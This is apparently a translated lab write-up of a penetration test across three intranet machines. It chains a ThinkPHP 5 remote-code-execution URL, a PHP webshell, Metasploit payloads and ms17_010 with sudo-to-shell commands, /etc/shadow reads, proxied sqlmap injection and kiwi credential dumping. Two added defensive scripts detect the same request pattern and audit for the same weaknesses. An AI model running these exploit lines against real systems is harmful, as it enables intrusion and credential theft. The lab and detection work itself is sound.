Virtual network card configuration
Environment issues:
- The VM's bridged adapter could not obtain an IP address; solved by restoring the default virtual network settings and binding the bridge to the physical network card.
- On target machine 1, the internal network card could not obtain an IP address; solved by adding a network configuration file.
Start the penetration test:
Attack machine (Kali): 192.168.1.13
CentOS 7 (target 1): 192.168.1.16 (external)
192.168.22.11 (internal)
Port scan
Used nmap to scan for vulnerabilities:
nmap -sS -A 192.168.101.91 --script=vuln
(Slow; no screenshot.)
Visited port 80.
Tested for the Baota (宝塔, "pagoda") panel unauthenticated-access issue: not present.
Checked robots.txt and found flag1.
Searched Baidu for ThinkPHP v5 vulnerabilities and found the remote code execution vulnerability:
https://www.cnblogs.com/backlion/p/10106676.html
http://192.168.1.16/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Executed commands through the RCE and found flag2:
Wrote a one-line PHP webshell ("one-sentence Trojan", 一句话木马).
Found the third flag while using command execution to look for a writable path for the webshell.
Switched to a new payload to write the one-line webshell shy.php; the previous one was written successfully, but its path could not be found.
Connected with China Chopper (菜刀).
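A defender-side way to spot the request pattern above in web server logs, as an added example (not code from the original write-up): it parses combined-format access log lines, decodes the URL, flags requests routed to invokefunction, and rates them by the callback passed in function=. The log lines are constructed samples, and the ThinkPHP 5.1 think\Container route is covered alongside the think\app route used above.

```python
import re
from urllib.parse import unquote

# The ThinkPHP 5.x RCE above routes s= to think\app (5.0) or think\Container (5.1)
# invokefunction; the backslashes are usually %5C-encoded in logs, so decode first.
ROUTE_RE = re.compile(r"(?i)think[\\/](?:app|container)[\\/]invokefunction")
FUNC_RE = re.compile(r"(?i)[?&]function=([a-z0-9_]+)")
# Callbacks that turn invokefunction into code execution or file writes.
SUSPECT_FUNCS = {"call_user_func_array", "call_user_func", "system", "exec",
                 "shell_exec", "passthru", "assert", "file_put_contents"}
# Combined log format: client ident user [ts] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status = m.groups()
    return {"client": client, "ts": ts, "method": method,
            "path": unquote(path), "status": int(status)}


def classify(entry):
    """Return a finding if the request targets invokefunction, else None."""
    if not ROUTE_RE.search(entry["path"]):
        return None
    fm = FUNC_RE.search(entry["path"])
    func = fm.group(1).lower() if fm else None
    return {"client": entry["client"], "ts": entry["ts"], "function": func,
            "severity": "high" if func in SUSPECT_FUNCS else "medium",
            # HTTP 200 means the route resolved; 500 usually means the attempt failed
            "succeeded": entry["status"] == 200}


def scan(lines):
    """Run every parsable line through classify() and keep the findings."""
    entries = (parse_line(line) for line in lines)
    return [f for f in (classify(e) for e in entries if e) if f]


# Constructed sample log: the phpinfo probe from the notes, a benign request,
# and a failed probe against the 5.1 Container route with no function given.
SAMPLE = [
    '192.168.1.13 - - [10/Oct/2020:10:00:00 +0800] "GET /index.php?s=index/%5Cthink%5Capp/'
    'invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2020:10:00:02 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.1.13 - - [10/Oct/2020:10:00:05 +0800] "GET /index.php?s=index/%5Cthink%5CContainer/invokefunction HTTP/1.1" 500 321 "-" "curl/7.68.0"',
]
```

Run scan() over a real access log (one line per list element) and alert on any "high" finding with succeeded set, since that means the route resolved and the callback was accepted.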
Information gathering:
1. uname -a
Linux 3.10.0-1062.1.1.el7.x86_64 x86_64
Kernel version: 3
Major revision: 10
Minor revision: 0
Patch/build: 1062.1.1.el7
2. hostnamectl
CentOS 7 x86
Based on the collected information, generated a matching payload with msf.
Uploaded the generated payload file with Chopper.
Gave it execute permission from Chopper and ran it.
msf received the shell.
python -c 'import pty; pty.spawn("/bin/bash")' to get an interactive shell.
Attempted SUID privilege escalation:
find / -user root -perm -4000 -print 2>/dev/null
Checked whether /etc/passwd and /etc/shadow are writable.
How this would be used: replace the root password field "x" in /etc/passwd with a hash of our own (for example one taken from our own Linux box) to change the target's root password.
Whether /etc/shadow is readable: if it is, the hashes can be cracked offline.
Sudo abuse? The problem is that I don't even know the www user's password. Can I change my own password? I just tested it.
sudo lets ordinary users run commands as the superuser. Its configuration file is /etc/sudoers, which defines which accounts may run sudo, which programs they may run as root, and whether password authentication is required.
Check which commands can be run through sudo; this does not need the root password, only the ordinary user's own password:
sudo awk 'BEGIN {system("/bin/sh")}'
sudo man man
sudo curl file:///etc/shadow
https://gtfobins.github.io/
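An added audit script (not from the original write-up) that checks the same three local privilege-escalation conditions from the defender's side: world-writable /etc/passwd, world-readable /etc/shadow, and sudoers rules that are NOPASSWD, grant ALL, or name the awk/man/curl binaries listed above. It is POSIX sh; the file paths are parameters so it can be run against exported copies, and the issue labels it prints are my own naming.

```shell
#!/bin/sh
# Audit of the local privilege-escalation surface checked in the notes above:
# writable /etc/passwd, readable /etc/shadow, and sudo rules that need no
# password or hand out ALL / shell-capable binaries (awk, man, curl).
# Added example, not part of the original write-up; POSIX sh, no GNU stat.

# Print world-writable, world-readable, missing or ok, judged from the
# "other" bits of ls -ld output (world-writable wins when both are set).
check_mode() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ????????w?) echo "world-writable" ;;
        ???????r??) echo "world-readable" ;;
        "")         echo "missing" ;;
        *)          echo "ok" ;;
    esac
}

# Print non-root sudoers rules that are NOPASSWD, grant ALL, or name one of
# the binaries the notes use to spawn a shell. $1 is the sudoers file (a copy
# is fine), so the audit can run on an exported file as well as the live one.
risky_sudo_rules() {
    grep -Ev '^[[:space:]]*(#|root[[:space:]]|$)' "$1" 2>/dev/null \
        | grep -E 'NOPASSWD|[[:space:]]ALL[[:space:]]*$|/(awk|man|curl)([[:space:]]|$)'
}

# Verdict line: "clean" or a comma-separated list of issues.
# Arguments (all optional): passwd file, shadow file, sudoers file.
audit() {
    issues=""
    [ "$(check_mode "${1:-/etc/passwd}")" = "world-writable" ] && issues="${issues}passwd-writable,"
    case "$(check_mode "${2:-/etc/shadow}")" in
        world-*) issues="${issues}shadow-exposed," ;;
    esac
    [ -n "$(risky_sudo_rules "${3:-/etc/sudoers}")" ] && issues="${issues}sudo-risky,"
    issues="${issues%,}"
    echo "${issues:-clean}"
}
```

Running audit with no arguments checks the live files (sudoers needs root to read); anything other than "clean" is a finding worth fixing before an attacker with a web shell reaches the host.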
Checked scheduled tasks (cron): nothing there either.
Kernel stack-overflow privilege escalation:
Forget it, skip privilege escalation and go straight to intranet penetration.
Checked that the target also has an address in the 22 network segment.
Added a route.
Set up a proxy.
Tested whether the proxy works: the host cannot be pinged (different network segment), but it can be reached through the proxy, so the proxy is working.
Scanned through the proxy with nmap and found live host 22.22 in the intranet's 22 segment.
Ran a detailed nmap scan.
Found port 80 open; configured Firefox to use the proxy.
Accessed port 80.
Found a hint in the page source.
Started sqlmap:
proxychains sqlmap -u "192.168.22.22/index.php?r=vul&keyword=1" -p keyword
Enumerated the databases.
Enumerated the tables.
Enumerated the columns.
Cracked the password hash.
robots.txt revealed the back-end (admin) address.
Logged into the back end and found the flag.
Then I was stuck in the back end for a long time, because there were too many features to try: file upload, database backup, database command execution, and so on. It took a long time.
Modified a template from the back-end admin (stuck here for a long time: creating a new file or modifying other files does not work; you have to modify the index file and then let it run automatically).
Accessed phpinfo() to get the website's root directory:
http://192.168.22.22/index.php?r=tag
Configured the proxy on the physical (host) machine, because Chopper cannot be used on Kali.
Used a proxy tool.
Connected with Chopper.
From Chopper's virtual terminal, found that there is also a 33 network segment.
Information gathering: Ubuntu x86
Used msf to generate the backdoor file. Because this server sits inside the intranet and is not a border machine, it cannot reach our attack machine, so a reverse_tcp reverse connection cannot be used; only bind_tcp (forward connection) works. bind_tcp opens a port on the server and msf actively connects to that port; which port is opened is decided when the attacker generates the backdoor file with msf.
Generated it
and uploaded it to the 22.22 machine with Chopper.
Configured the msf listener (note: the port here must match the port used when generating).
Ran it from Chopper; msf got the shell.
Found that there is a 33 network segment.
Added a route.
Scanned for live hosts by specifying a few ports and found intranet host 33.33.
Scanned the open ports of 33.33 one by one.
Port 445 is open; used the msf ms17_010 module directly.
load kiwi: load the kiwi module
help kiwi: view its help
creds_all: enumerate all credentials
Created a new user.
Logged in successfully.